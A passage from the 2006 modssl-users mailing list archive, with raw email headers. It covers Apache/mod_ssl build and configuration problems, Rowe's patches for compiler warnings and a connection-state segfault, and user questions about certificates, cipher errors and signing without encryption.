ago on
> this forum related to X509_free being undefined.  Take a look at
this:
> 
> http://www.mail-archive.com/modssl-users@modssl.org/msg14344.html 
> 
> The short short version is that you should try recompiling apache
with
> --enable-ssl=static .

Thanks, that fixed it.

GTG
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb  8 14:46:25 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id CF6FC14D85B; Wed,  8 Feb 2006 14:46:24 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mx3.ccw.gov.uk (mx3.ccw.gov.uk [194.83.155.67])
	by master.modssl.org (Postfix) with ESMTP id 1633C14D835
	for ; Wed,  8 Feb 2006 14:46:23 +0100 (CET)
Received: from [192.168.253.7] (helo=host3.hq.ccw.gov.uk)
	by mx3.ccw.gov.uk with esmtp (Exim 4.51)
	id 1F6peH-00083K-7B
	for modssl-users@modssl.org; Wed, 08 Feb 2006 13:46:21 +0000
Received: from gwia3.hq.ccw.gov.uk ([192.168.24.78] helo=gwia3.ccw.gov.uk)
	by host3.hq.ccw.gov.uk with esmtp (Exim 4.14)
	id 1F6qMY-0004lX-Ue
	for modssl-users@modssl.org; Wed, 08 Feb 2006 14:32:06 +0000
Received: from CCW_GWIA3-MTA by gwia3.ccw.gov.uk
	with Novell_GroupWise; Wed, 08 Feb 2006 13:40:31 +0000
Message-Id: <43E9F616.AC0B.0006.3@ccw.gov.uk>
X-Mailer: Novell GroupWise Internet Agent 7.0 
Date: Wed, 08 Feb 2006 13:45:58 +0000
From: "Gordon Ross" 
To: 
Subject: Re: undefined symbol: RSA_generate_key
References: <43E876C4.AC0B.0006.3@ccw.gov.uk>   <20060207223021.GA27112@redhat.com>
In-Reply-To: <20060207223021.GA27112@redhat.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Gordon Ross" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

>>> On 07 February 2006 at 22:30:21, in message
<20060207223021.GA27112@redhat.com>, jorton@redhat.com wrote:
> Or upgrade to 2.2, which fixes this problem ;)

I had a quick go at that, but got build errors. Anyway, as the
--enable-ssl=static worked for 2.0.55, and I'm not a great fan of .0
releases I'm not too worried right now.

Thanks anyway,

GTG
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb  8 15:08:34 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 56F5D14D853; Wed,  8 Feb 2006 15:08:34 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from uproxy.gmail.com (uproxy.gmail.com [66.249.92.192])
	by master.modssl.org (Postfix) with ESMTP id D8DB914D835
	for ; Wed,  8 Feb 2006 15:08:33 +0100 (CET)
Received: by uproxy.gmail.com with SMTP id u40so98681ugc
        for ; Wed, 08 Feb 2006 06:08:31 -0800 (PST)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:sender:to:subject:in-reply-to:mime-version:content-type:references;
        b=mHanbDrdFzGu7cL65t6l2YvxqL74cyzzzQvIiOQ5G1taKLFLSbYcz6njKAqLo7trYvDxPegKnD5TNFCremFvRxy+Nip+JOTThYWAT32/4KLldbndKjBXb3vVMWpVly4DZdu9mhvHtriR1gHY0pgv0b7MPWKt5/9T08KiWOVH7N4=
Received: by 10.48.108.7 with SMTP id g7mr1988597nfc;
        Wed, 08 Feb 2006 06:08:31 -0800 (PST)
Received: by 10.49.28.20 with HTTP; Wed, 8 Feb 2006 06:08:31 -0800 (PST)
Message-ID: 
Date: Wed, 8 Feb 2006 09:08:31 -0500
From: Cliff Woolley 
To: modssl-users@modssl.org
Subject: Re: undefined symbol: RSA_generate_key
In-Reply-To: <43E9F616.AC0B.0006.3@ccw.gov.uk>
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_1823_20881336.1139407711395"
References: <43E876C4.AC0B.0006.3@ccw.gov.uk>
	 
	 <20060207223021.GA27112@redhat.com> <43E9F616.AC0B.0006.3@ccw.gov.uk>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_1823_20881336.1139407711395
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

On 2/8/06, Gordon Ross  wrote:
>
> >>> On 07 February 2006 at 22:30:21, in message
> <20060207223021.GA27112@redhat.com>, jorton@redhat.com wrote:
> > Or upgrade to 2.2, which fixes this problem ;)
>
> I had a quick go at that, but got build errors. Anyway, as the
> --enable-ssl=3Dstatic worked for 2.0.55, and I'm not a great fan of .0
> releases I'm not too worried right now.
>

Would you mind sharing with dev@httpd.apache.org what those build errors
were?  That would be helpful.  :)

As for the .0 thing, it's .2.0, which is rather different... but whatever.
;)

------=_Part_1823_20881336.1139407711395
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

On 2/8/06, Gordon Ross <G.Ross@ccw.gov.uk> wrote:

>>> On 07 February 2006 at 22:30:21, in message
<20060207223021.GA27112@redhat.com=
>, jorton@redhat.com wrote:

> Or upgrade to 2.2, which fixes this problem ;)

I had a quic=
k go at that, but got build errors. Anyway, as the
--enable-ssl=3Dstatic=
 worked for 2.0.55, and I'm not a great fan of .0
releases I'm not too w=
orried right now.


Would you mind sharing with dev@httpd.apache.org what those build errors were?&=
nbsp; That would be helpful.  :)

As for the .0 thing, it's .2.0=
, which is rather different... but whatever.  ;)



------=_Part_1823_20881336.1139407711395--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb  8 19:17:00 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id CF38214D84C; Wed,  8 Feb 2006 19:17:00 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from pythagoras.numenet.com (dcn251-10.dcn.davis.ca.us [168.150.251.10])
	by master.modssl.org (Postfix) with ESMTP id 4E2AB14D835
	for ; Wed,  8 Feb 2006 19:16:59 +0100 (CET)
Received: from localhost (localhost.localdomain [127.0.0.1])
	by pythagoras.numenet.com (Postfix) with ESMTP id 6495A7C5FD
	for ; Wed,  8 Feb 2006 10:13:41 -0800 (PST)
Received: from pythagoras.numenet.com ([127.0.0.1])
 by localhost (pythagoras.numenet.com [127.0.0.1]) (amavisd-new, port 10024)
 with ESMTP id 22972-02 for ;
 Wed,  8 Feb 2006 10:13:39 -0800 (PST)
Received: from Blackbird.numenet.com (c-24-23-165-233.hsd1.ca.comcast.net [24.23.165.233])
	by pythagoras.numenet.com (Postfix) with ESMTP id D8BDD7C5F9
	for ; Wed,  8 Feb 2006 10:13:38 -0800 (PST)
Message-Id: <5.1.0.14.2.20060208101130.05adfe40@pythagoras.numenet.com>
X-Sender: liamk@pythagoras.numenet.com
X-Mailer: QUALCOMM Windows Eudora Version 5.1
Date: Wed, 08 Feb 2006 10:17:11 -0800
To: modssl-users@modssl.org
From: Liam Kirsher 
Subject: Re: SSLCACertificateFile crashes Apache
In-Reply-To: 
References: <5.1.0.14.2.20060207114706.0595fe48@pythagoras.numenet.com>
 <5.1.0.14.2.20060207114706.0595fe48@pythagoras.numenet.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
X-Virus-Scanned: amavisd-new at numenet.com
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Liam Kirsher 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Yes, the path is correct -- I triple checked it!
Possible issues -- this is running on a virtual server, so I guess the 
given root isn't the real root, and maybe it's getting confused.
Or maybe... it's not clear which file it's not finding.  In my google 
search I found some semi-related posts that seemed to indicate it might 
need to have access to the openssl.cnf file, which is not on this virtual 
server.

I've already spent too much time on this issue, so I'm going to have to use 
a different certificate authority.

Thanks for taking a look, though.

Liam

At 09:33 PM 2/7/2006 -0500, you wrote:


>On 2/7/06, Liam Kirsher <liamk@numenet.com> wrote:
>>
>>
>>
>> >[07/Feb/2006 11:57:08 25653] [error] OpenSSL: error:02001002:system 
>> library:fopen:No such file or directory
>
>
>Are you sure the path is correct?  Is the path relative or absolute as you 
>indicated in your post?
>
>
>--
>"But we also know the dangers of a religion that severs its links with 
>reason and becomes prey to fundamentalism" --  Cardinal Paul Poupard
>"It morphs into the Republican party!"  -- BJ

Liam Kirsher 
415-456-4420
415-438-0384 (cell)
PGP: http://liam.numenet.com/pgp/


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Feb 10 20:52:05 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 0B7B214D84A; Fri, 10 Feb 2006 20:52:05 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from dreadnought.cnchost.com (dreadnought.cnchost.com [207.155.248.18])
	by master.modssl.org (Postfix) with ESMTP id 25C5514D831
	for ; Fri, 10 Feb 2006 20:52:03 +0100 (CET)
Received: from [192.168.0.21] (c-24-13-128-132.hsd1.il.comcast.net [24.13.128.132])
	by dreadnought.cnchost.com
	id OAA08272; Fri, 10 Feb 2006 14:51:54 -0500 (EST)
	[ConcentricHost SMTP Relay 1.17]
Message-ID: <43ECEE52.1040802@rowe-clan.net>
Date: Fri, 10 Feb 2006 13:49:38 -0600
From: "William A. Rowe, Jr." 
User-Agent: Mozilla Thunderbird 1.0.7-1.1.fc3 (X11/20050929)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Cleanup of mod_ssl compiler warnings
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "William A. Rowe, Jr." 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

The following patches mop up some unnecessary compile warnings, when the 
functions are properly decorated.  It's been sitting in my drafts waiting
for a subscription to go through for 3 months, so feel free to verify that
they are still appropriate.



   --- mod_ssl.h	25 Oct 2005 04:32:42 -0000	1.1
   +++ mod_ssl.h	25 Oct 2005 05:54:19 -0000	1.2
   @@ -108,6 +108,10 @@
    #include 
    #endif
    #ifdef WIN32
   +#ifndef WIN32_LEAN_AND_MEAN
   +#define WIN32_LEAN_AND_MEAN
   +#endif
   +#include 
    #include 
    #include 
    #endif
   @@ -759,7 +763,7 @@

    /*  Pass Phrase Support  */
    void         ssl_pphrase_Handle(server_rec *, pool *);
   -int          ssl_pphrase_Handle_CB(char *, int, int);
   +int          ssl_pphrase_Handle_CB(char *, int, int, void *);

    /*  Diffie-Hellman Parameter Support  */
    DH           *ssl_dh_GetTmpParam(int);
   --- ssl_engine_pphrase.c	25 Oct 2005 04:32:35 -0000	1.1
   +++ ssl_engine_pphrase.c	25 Oct 2005 05:54:19 -0000	1.2
   @@ -389,7 +389,7 @@
        return;
    }

   -int ssl_pphrase_Handle_CB(char *buf, int bufsize, int verify)
   +int ssl_pphrase_Handle_CB(char *buf, int bufsize, int verify, void *nadda)
    {
        SSLModConfigRec *mc = myModConfig();
        server_rec *s;
   --- ssl_util_ssl.c	25 Oct 2005 04:32:39 -0000	1.1
   +++ ssl_util_ssl.c	25 Oct 2005 05:54:19 -0000	1.2
   @@ -98,7 +98,7 @@
    **  _________________________________________________________________
    */

   -X509 *SSL_read_X509(FILE *fp, X509 **x509, int (*cb)())
   +X509 *SSL_read_X509(FILE *fp, X509 **x509, int (*cb)(char*,int,int,void*))
    {
        X509 *rc;
        BIO *bioS;
   @@ -151,7 +151,7 @@
    }
    #endif

   -EVP_PKEY *SSL_read_PrivateKey(FILE *fp, EVP_PKEY **key, int (*cb)())
   +EVP_PKEY *SSL_read_PrivateKey(FILE *fp, EVP_PKEY **key, int
(*cb)(char*,int,int,void*))
    {
        EVP_PKEY *rc;
        BIO *bioS;
   @@ -464,7 +464,7 @@
     * should be sent to the peer in the SSL Certificate message.
     */
    int SSL_CTX_use_certificate_chain(
   -    SSL_CTX *ctx, char *file, int skipfirst, int (*cb)())
   +    SSL_CTX *ctx, char *file, int skipfirst, int (*cb)(char*,int,int,void*))
    {
        BIO *bio;
        X509 *x509;
   --- ssl_util_ssl.h	25 Oct 2005 04:32:37 -0000	1.1
   +++ ssl_util_ssl.h	25 Oct 2005 05:54:19 -0000	1.2
   @@ -103,8 +103,8 @@
    int         SSL_get_app_data2_idx(void);
    void       *SSL_get_app_data2(SSL *);
    void        SSL_set_app_data2(SSL *, void *);
   -X509       *SSL_read_X509(FILE *, X509 **, int (*)());
   -EVP_PKEY   *SSL_read_PrivateKey(FILE *, EVP_PKEY **, int (*)());
   +X509       *SSL_read_X509(FILE *, X509 **, int (*)(char*,int,int,void*));
   +EVP_PKEY   *SSL_read_PrivateKey(FILE *, EVP_PKEY **, int
(*)(char*,int,int,void*));
    int         SSL_smart_shutdown(SSL *ssl);
    X509_STORE *SSL_X509_STORE_create(char *, char *);
    int         SSL_X509_STORE_lookup(X509_STORE *, int, X509_NAME *,
X509_OBJECT *);
   @@ -116,7 +116,7 @@
    BOOL        SSL_load_CrtAndKeyInfo_file(pool *, STACK_OF(X509_INFO) *, char *);
    BOOL        SSL_load_CrtAndKeyInfo_path(pool *, STACK_OF(X509_INFO) *, char *);
    #endif /* SSL_EXPERIMENTAL_PROXY */
   -int         SSL_CTX_use_certificate_chain(SSL_CTX *, char *, int, int (*)());
   +int         SSL_CTX_use_certificate_chain(SSL_CTX *, char *, int, int
(*)(char*,int,int,void*));
    char       *SSL_SESSION_id2sz(unsigned char *, int);

    #endif /* SSL_UTIL_SSL_H */


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Feb 10 22:02:42 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 135AE14D849; Fri, 10 Feb 2006 22:02:42 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from dreadnought.cnchost.com (dreadnought.cnchost.com [207.155.248.18])
	by master.modssl.org (Postfix) with ESMTP id 221E114D831
	for ; Fri, 10 Feb 2006 22:02:40 +0100 (CET)
Received: from [192.168.0.21] (c-24-13-128-132.hsd1.il.comcast.net [24.13.128.132])
	by dreadnought.cnchost.com
	id QAA19877; Fri, 10 Feb 2006 16:02:37 -0500 (EST)
	[ConcentricHost SMTP Relay 1.17]
Message-ID: <43ECFEE9.6010104@rowe-clan.net>
Date: Fri, 10 Feb 2006 15:00:25 -0600
From: "William A. Rowe, Jr." 
User-Agent: Mozilla Thunderbird 1.0.7-1.1.fc3 (X11/20050929)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: PATCH Prevent segfaults in connection state
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "William A. Rowe, Jr." 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Maintainers,

This patch addresses a still-outstanding flaw in mod_ssl, on *all* platforms.
However it's rarely evident on any platform other than Win32, because only Win32
recycles memory -so quickly- on other threads, that the cleanup cannot be
invoked.

Instead, in the LogRequest (request-is-done) hook is used to clean everything
up before r->pool goes poof.

Please, again consider this patch... I'm finished submitting through private
channels and would like the end-users to be able to take advantage of it already.

Thanks.

Bill


   --- mod_ssl.h	25 Oct 2005 04:32:42 -0000	1.1
   +++ mod_ssl.h	25 Oct 2005 05:54:19 -0000	1.2
   @@ -711,6 +711,7 @@
    int          ssl_hook_Fixup(request_rec *);
    int          ssl_hook_ReadReq(request_rec *);
    int          ssl_hook_Handler(request_rec *);
   +int          ssl_hook_LogRequest(request_rec *r);

    /*  OpenSSL callbacks */
    RSA         *ssl_callback_TmpRSA(SSL *, int, int);
   --- mod_ssl.c	25 Oct 2005 04:32:46 -0000	1.1
   +++ mod_ssl.c	25 Oct 2005 05:52:20 -0000	1.2
   @@ -231,7 +231,7 @@
        ssl_hook_Access,          /* [#3] check access by host address   */
        NULL,                     /* [#6] determine MIME type            */
        ssl_hook_Fixup,           /* [#7] pre-run fixups                 */
   -    NULL,                     /* [#9] log a transaction              */
   +    ssl_hook_LogRequest,      /* [#9] log a transaction              */
        NULL,                     /* [#2] header parser                  */
        ssl_init_Child,           /* child_init                          */
        NULL,                     /* child_exit                          */
   --- ssl_engine_io.c	25 Oct 2005 04:32:28 -0000	1.1
   +++ ssl_engine_io.c	25 Oct 2005 05:52:20 -0000	1.2
   @@ -263,7 +263,7 @@
            r = (request_rec *)ap_ctx_get(actx, "ssl::request_rec");

        rv = -1;
   -    if (r != NULL) {
   +    if (r != NULL && r->ctx != NULL) {
            ss = ap_ctx_get(r->ctx, "ssl::io::suck");
            if (ss != NULL) {
                if (ss->active && ss->pendlen > 0) {
   --- ssl_engine_kernel.c	25 Oct 2005 04:32:41 -0000	1.1
   +++ ssl_engine_kernel.c	25 Oct 2005 05:52:20 -0000	1.2
   @@ -542,6 +542,28 @@
    }

    /*
   + *  Logging Handler, last chance at request_rec
   + */
   +int ssl_hook_LogRequest(request_rec *r)
   +{
   +    SSL *ssl;
   +    ap_ctx *apctx;
   +
   +    /* Mitigate potential damage of any invalid ssl::request_rec
   +     * by clearing this datum prior to child_sub_main destroying
   +     * our r->pool (and within in, our request_rec!!!)
   +     */
   +    ssl = ap_ctx_get(r->connection->client->ctx, "ssl");
   +    if (ssl != NULL) {
   +        apctx = SSL_get_app_data2(ssl);
   +        if (apctx && ap_ctx_get(apctx, "ssl::request_rec")) {
   +            ap_ctx_set(apctx, "ssl::request_rec", NULL);
   +        }
   +    }
   +    return OK;
   +}
   +
   +/*
     *  Post Read Request Handler
     */
    int ssl_hook_ReadReq(request_rec *r)



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Feb 13 17:21:43 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 8CCC814D9A2; Mon, 13 Feb 2006 17:21:43 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from UTM-MAIL08A.mdacc.tmc.edu (utmlnmail08nt.mdacc.tmc.edu [143.111.84.167])
	by master.modssl.org (Postfix) with ESMTP id 8E68F14D83E
	for ; Mon, 13 Feb 2006 17:21:42 +0100 (CET)
Subject: Apache with Mod_SSL installation problems
To: modssl-users@modssl.org
X-Mailer: Lotus Notes Release 5.0.11   July 24, 2002
Message-ID: 
From: dpgirago@mdanderson.org
Date: Mon, 13 Feb 2006 10:21:38 -0600
X-MIMETrack: Serialize by Router on UTM-MAIL08A/HOU/UTMDACC(Release 5.0.11  |July 24, 2002) at
 02/13/2006 10:21:41 AM
MIME-Version: 1.0
Content-type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: dpgirago@mdanderson.org
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hope this is the right place to ask this question. Please direct to another
list if I'm off-topic here.

I'm trying to install Apache 1.3.31 with Mod_SSL on a Windows Server 2003
box, ultimately for Apache-MySQL-PHP applications. I have all set up ok on
my desk top and thought it would be a simple to do the same on the server
but Apache is unable to access httpd.conf and php dll's. Obviously it's a
permissions problem, but I logged in as a local administrator for the
installation, which I've been told by the server administrator is a 'local
user'.  He doesn't understand why Apache would be  denied permission to
access httpd.conf, and I'm at a loss to explain why this is happening.  Can
anyone enlighten me how to proceed?

Thanks in advance.

David


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Feb 14 20:57:12 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id F41A214D854; Tue, 14 Feb 2006 20:57:11 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from www.ma-meteo.com (www.ma-meteo.com [212.85.152.10])
	by master.modssl.org (Postfix) with ESMTP id C1B8B14D831
	for ; Tue, 14 Feb 2006 20:57:11 +0100 (CET)
Received: from [192.168.1.103] (mei67-1-81-56-35-79.fbx.proxad.net [81.56.35.79])
	(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
	(No client certificate requested)
	by www.ma-meteo.com (Postfix) with ESMTP id 9E2E61B681
	for ; Tue, 14 Feb 2006 20:57:09 +0100 (CET)
Message-ID: <43F23612.4010702@meteo-strasbourg.net>
Date: Tue, 14 Feb 2006 20:57:06 +0100
From: jf 
User-Agent: Mozilla Thunderbird 1.0.7 (X11/20051013)
X-Accept-Language: fr, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: apache 2.0.54, unexpected change cipher
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: jf 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

I'm using mod_ssl with apache 2.0.54-5, on a Debian Sarge.

My trouble is that Firefox sometimes returns an error 12237 which means 
SSL_ERROR_RX_UNEXPECTED_CHANGE_CIPHER "SSL received an unexpected Change 
Cipher Spec record.

It happens with Firefox 1.0.7 on Linux and Firefox 1.5 on Windows.

On my server, I'm using a valide certificate without any client 
verification.

I used a session cache like this:
SSLSessionCache        shmht:/var/run/apache2/ssl_scache(512000)
SSLSessionCacheTimeout  300
But after disabling it with "SSLSessionCache none" and reloading the 
server the problem is still here.

I've set LogLevel to warn, but there isn't any message in my logs.

I just migrate from apache-1.3, and there wasn't any problem with 1.3, 
so I think it's not a Firefox issue.

I'm using keepalive connection like this:
KeepAlive On
MaxKeepAliveRequests 100
KeepAliveTimeout 15

It seems happend when I reload a page with a basic authentication, but 
I'm not really sure because I always has a lot of open tabs, some with 
an authentication and other without.

Could you give me some tricks to resolve this ?
Thanks.

Regards,
Jean-François
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Feb 16 19:58:50 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id D021214D9D3; Thu, 16 Feb 2006 19:58:50 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web51813.mail.yahoo.com (web51813.mail.yahoo.com [206.190.39.232])
	by master.modssl.org (Postfix) with SMTP id EAD6F14D82C
	for ; Thu, 16 Feb 2006 19:58:49 +0100 (CET)
Received: (qmail 22538 invoked by uid 60001); 16 Feb 2006 18:58:47 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  h=Message-ID:Received:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding;
  b=wGiEz3stY2s1yT9yqZyuVxcL9tNQoB5O4KPV7ZCEGahTeY4F3Jg97MAQOKR5ISpbptaNbMzS4MUZKR5jV6kUq4bMVp4opwqdamHaheyQXHYNgy1rmpcOFJk0XAznuTDqPAFDphyL9heR/ff/GzLdi5UI0hS7jrZjEp3LD3DYxIE=  ;
Message-ID: <20060216185847.22536.qmail@web51813.mail.yahoo.com>
Received: from [70.112.214.159] by web51813.mail.yahoo.com via HTTP; Thu, 16 Feb 2006 10:58:47 PST
Date: Thu, 16 Feb 2006 10:58:47 -0800 (PST)
From: Arjun Khanna 
Subject: toggling signing and encryption using Mod_SSL + certificates
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="0-548178878-1140116327=:22482"
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Arjun Khanna 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

--0-548178878-1140116327=:22482
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit

Hi:
  I am working on securing a webservice front-ended by the Apache webserver.
   
  It is possible that in this application the requirements will be :
  (1) Clients be authenticated using a password they enter using a form that is secured using https. For this I am planning to download mod_ssl and get a certificate from Versign/Thwate. I have the information I need to enable this [documentation avail on the net].
   
  (2) Once the client is verified, then it is possible that subsequent interactions of that client will include 'getting' documents from this website. The only caveat is: It is possible that once signed in, the exchange between the client/server will require no encryption, but only a digital signature to guarantee that the document has not been tampered with.
   
  My question relates to (2). Is it possible to set up mod_ssl + apache configuration that the sign-in of the client happens using a form enabled over https [contents are encrypted]. But subsequent interactions of an authenticated client do not suffer encryption while simultaneously providing a digital signature guarantee [hence ensuring that the document is tamper-proof]?  so basically- I am asking 
  2.1) is it possible to turn on signing while disabling encryption?
  2.2) Is this possible to do over one webserver using virtual hosts or will I need more than one instance of the service?
   
  Thanks in advance.
  Arjun Khanna.
   

		
---------------------------------
Relax. Yahoo! Mail virus scanning helps detect nasty viruses!
--0-548178878-1140116327=:22482
Content-Type: text/html; charset=iso-8859-1
Content-Transfer-Encoding: 8bit


Hi:
  
I am working on securing a webservice front-ended by the Apache webserver.
  
 
  
It is possible that in this application the requirements will be :
  
(1) Clients be authenticated using a password they enter using a form that is secured using https. For this I am planning to download mod_ssl and get a certificate from Versign/Thwate. I have the information I need to enable this [documentation avail on the net].
  
 
  
(2) Once the client is verified, then it is possible that subsequent interactions of that client will include 'getting' documents from this website. The only caveat is: It is possible that once signed in, the exchange between the client/server will require no encryption, but only a digital signature to guarantee that the document has not been tampered with.
  
 
  
My question relates to (2). Is it possible to set up mod_ssl + apache configuration that the sign-in of
 the client happens using a form enabled over https [contents are encrypted]. But subsequent interactions of an authenticated client do not suffer encryption while simultaneously providing a digital signature guarantee [hence ensuring that the document is tamper-proof]?  so basically- I am asking 
  
2.1) is it possible to turn on signing while disabling encryption?
  
2.2) Is this possible to do over one webserver using virtual hosts or will I need more than one instance of the service?
  
 
  
Thanks in advance.
  
Arjun Khanna.
  
 

		
Relax. Yahoo! Mail 
virus scanning helps detect nasty viruses!
--0-548178878-1140116327=:22482--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Feb 24 19:09:43 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 12B1814D862; Fri, 24 Feb 2006 19:09:43 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web51801.mail.yahoo.com (web51801.mail.yahoo.com [206.190.38.232])
	by master.modssl.org (Postfix) with SMTP id 8766D14D82D
	for ; Fri, 24 Feb 2006 19:09:41 +0100 (CET)
Received: (qmail 74962 invoked by uid 60001); 24 Feb 2006 18:09:39 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  h=Message-ID:Received:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding;
  b=Q67J7oT9RTSg4FAciR9YSVNy7gf6Z5ibAx3xO3n2Pp7swSkhaTWtjoJtCYwMYv5VTJNj1Q6VZoqIuktFsxjRAk0IyjOcVIGNtVMZxWpMRe2qkprn/oWVh+2h+wPzJQdVaNpPjUViYp0Ms9EwhKV9UqQmhMxo0CHJhYjyYrXvFH0=  ;
Message-ID: <20060224180939.74960.qmail@web51801.mail.yahoo.com>
Received: from [70.112.214.159] by web51801.mail.yahoo.com via HTTP; Fri, 24 Feb 2006 10:09:39 PST
Date: Fri, 24 Feb 2006 10:09:39 -0800 (PST)
From: Arjun Khanna 
Subject: digital signing vs. full encryption.
To: modssl-users@modssl.org
MIME-Version: 1.0
